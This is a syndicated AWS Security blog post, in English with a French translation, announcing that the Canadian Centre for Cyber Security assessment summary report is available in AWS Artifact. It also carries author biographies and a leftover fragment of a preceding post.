Se você tiver feedback sobre esta postagem, envie comentários na seção Comentários abaixo.

Quer mais notícias sobre segurança da AWS? Siga-nos no Twitter.


Rodrigo Fiuza

Rodrigo is a Security Audit Manager at AWS, based in São Paulo. He leads audits, attestations, certifications, and assessments across Latin America, Caribbean and Europe. Rodrigo has previously worked in risk management, security assurance, and technology audits for the past 12 years.

Canadian Centre for Cyber Security Assessment Summary report now available in AWS Artifact

Post Syndicated from Rob Samuel original https://aws.amazon.com/blogs/security/canadian-centre-for-cyber-security-assessment-summary-report-now-available-in-aws-artifact/

French version

At Amazon Web Services (AWS), we are committed to providing continued assurance to our customers through assessments, certifications, and attestations that support the adoption of AWS services. We are pleased to announce the availability of the Canadian Centre for Cyber Security (CCCS) assessment summary report for AWS, which you can view and download on demand through AWS Artifact.

The CCCS is Canada’s authoritative source of cyber security expert guidance for the Canadian government, industry, and the general public. Public and commercial sector organizations across Canada rely on CCCS’s rigorous Cloud Service Provider (CSP) IT Security (ITS) assessment in their decision to use CSP services. In addition, CCCS’s ITS assessment process is a mandatory requirement for AWS to provide cloud services to Canadian federal government departments and agencies.

The CCCS Cloud Service Provider Information Technology Security Assessment Process determines if the Government of Canada (GC) ITS requirements for the CCCS Medium Cloud Security Profile (previously referred to as GC’s PROTECTED B/Medium Integrity/Medium Availability [PBMM] profile) are met as described in ITSG-33 (IT Security Risk Management: A Lifecycle Approach, Annex 3 – Security Control Catalogue). As of September, 2021, 120 AWS services in the Canada (Central) Region have been assessed by the CCCS, and meet the requirements for medium cloud security profile. Meeting the medium cloud security profile is required to host workloads that are classified up to and including medium categorization. On a periodic basis, CCCS assesses new or previously unassessed services and re-assesses the AWS services that were previously assessed to verify that they continue to meet the GC’s requirements. CCCS prioritizes the assessment of new AWS services based on their availability in Canada, and customer demand for the AWS services. The full list of AWS services that have been assessed by CCCS is available on our Services in Scope by Compliance Program page.

To learn more about the CCCS assessment or our other compliance and security programs, visit AWS Compliance Programs. If you have questions about this blog post, please start a new thread on the AWS Artifact forum or contact AWS Support.

If you have feedback about this post, submit comments in the Comments section below. Want more AWS Security news? Follow us on Twitter.

Rob Samuel

Rob Samuel

Rob Samuel is a Principal technical leader for AWS Security Assurance. He partners with teams across AWS to translate data protection principles into technical requirements, aligns technical direction and priorities, orchestrates new technical solutions, helps integrate security and privacy solutions into AWS services and features, and addresses cross-cutting security and privacy requirements and expectations. Rob has more than 20 years of experience in the technology industry, and has previously held leadership roles, including Head of Security Assurance for AWS Canada, Chief Information Security Officer (CISO) for the Province of Nova Scotia, various security leadership roles as a public servant, and served as a Communications and Electronics Engineering Officer in the Canadian Armed Forces.

Naranjan Goklani

Naranjan Goklani

Naranjan Goklani is a Security Audit Manager at AWS, based in Toronto (Canada). He leads audits, attestations, certifications, and assessments across North America and Europe. Naranjan has more than 12 years of experience in risk management, security assurance, and performing technology audits. Naranjan previously worked in one of the Big 4 accounting firms and supported clients from the retail, ecommerce, and utilities industries.

Brian Mycroft

Brian Mycroft

Brian Mycroft is a Chief Technologist at AWS, based in Ottawa (Canada), specializing in national security, intelligence, and the Canadian federal government. Brian is the lead architect of the AWS Secure Environment Accelerator (ASEA) and focuses on removing public sector barriers to cloud adoption.



Rapport sommaire de l’évaluation du Centre canadien pour la cybersécurité disponible sur AWS Artifact

Par Robert Samuel, Naranjan Goklani et Brian Mycroft
Amazon Web Services (AWS) s’engage à fournir à ses clients une assurance continue à travers des évaluations, des certifications et des attestations qui appuient l’adoption des services proposés par AWS. Nous avons le plaisir d’annoncer la mise à disposition du rapport sommaire de l’évaluation du Centre canadien pour la cybersécurité (CCCS) pour AWS, que vous pouvez dès à présent consulter et télécharger à la demande sur AWS Artifact.

Le CCC est l’autorité canadienne qui met son expertise en matière de cybersécurité au service du gouvernement canadien, du secteur privé et du grand public. Les organisations des secteurs public et privé établies au Canada dépendent de la rigoureuse évaluation de la sécurité des technologies de l’information s’appliquant aux fournisseurs de services infonuagiques conduite par le CCC pour leur décision relative à l’utilisation de ces services infonuagiques. De plus, le processus d’évaluation de la sécurité des technologies de l’information est une étape obligatoire pour permettre à AWS de fournir des services infonuagiques aux agences et aux ministères du gouvernement fédéral canadien.

Le Processus d’évaluation de la sécurité des technologies de l’information s’appliquant aux fournisseurs de services infonuagiques détermine si les exigences en matière de technologie de l’information du Gouvernement du Canada (GC) pour le profil de contrôle de la sécurité infonuagique moyen (précédemment connu sous le nom de Protégé B/Intégrité moyenne/Disponibilité moyenne) sont satisfaites conformément à l’ITSG-33 (Gestion des risques liés à la sécurité des TI : Une méthode axée sur le cycle de vie, Annexe 3 – Catalogue des contrôles de sécurité). En date de septembre 2021, 120 services AWS de la région (centrale) du Canada ont été évalués par le CCC et satisfont aux exigences du profil de sécurité moyen du nuage. Satisfaire les exigences du niveau moyen du nuage est nécessaire pour héberger des applications classées jusqu’à la catégorie moyenne incluse. Le CCC évalue périodiquement les nouveaux services, ou les services qui n’ont pas encore été évalués, et réévalue les services AWS précédemment évalués pour s’assurer qu’ils continuent de satisfaire aux exigences du Gouvernement du Canada. Le CCC priorise l’évaluation des nouveaux services AWS selon leur disponibilité au Canada et en fonction de la demande des clients pour les services AWS. La liste complète des services AWS évalués par le CCC est consultable sur notre page Services AWS concernés par le programme de conformité.

Pour en savoir plus sur l’évaluation du CCC ainsi que sur nos autres programmes de conformité et de sécurité, visitez la page Programmes de conformité AWS. Comme toujours, nous accordons beaucoup de valeur à vos commentaires et à vos questions; vous pouvez communiquer avec l’équipe Conformité AWS via la page Communiquer avec nous.

Si vous avez des commentaires sur cette publication, n’hésitez pas à les partager dans la section Commentaires ci-dessous. Vous souhaitez en savoir plus sur AWS Security? Retrouvez-nous sur Twitter.

Biographies des auteurs :

Rob Samuel : Rob Samuel est responsable technique principal d’AWS Security Assurance. Il collabore avec les équipes AWS pour traduire les principes de protection des données en recommandations techniques, aligne la direction technique et les priorités, met en œuvre les nouvelles solutions techniques, aide à intégrer les solutions de sécurité et de confidentialité aux services et fonctionnalités proposés par AWS et répond aux exigences et aux attentes en matière de confidentialité et de sécurité transversale. Rob a plus de 20 ans d’expérience dans le secteur de la technologie et a déjà occupé des fonctions dirigeantes, comme directeur de l’assurance sécurité pour AWS Canada, responsable de la cybersécurité et des systèmes d’information (RSSI) pour la province de la Nouvelle-Écosse, divers postes à responsabilités en tant que fonctionnaire et a servi dans les Forces armées canadiennes en tant qu’officier du génie électronique et des communications.

Naranjan Goklani : Naranjan Goklani est responsable des audits de sécurité pour AWS, il est basé à Toronto (Canada). Il est responsable des audits, des attestations, des certifications et des évaluations pour l’Amérique du Nord et l’Europe. Naranjan a plus de 12 ans d’expérience dans la gestion des risques, l’assurance de la sécurité et la réalisation d’audits de technologie. Naranjan a exercé dans l’une des quatre plus grandes sociétés de comptabilité et accompagné des clients des industries de la distribution, du commerce en ligne et des services publics.

Brian Mycroft : Brian Mycroft est technologue en chef pour AWS, il est basé à Ottawa (Canada) et se spécialise dans la sécurité nationale, le renseignement et le gouvernement fédéral du Canada. Brian est l’architecte principal de l’AWS Secure Environment Accelerator (ASEA) et s’intéresse principalement à la suppression des barrières à l’adoption du nuage pour le secteur public.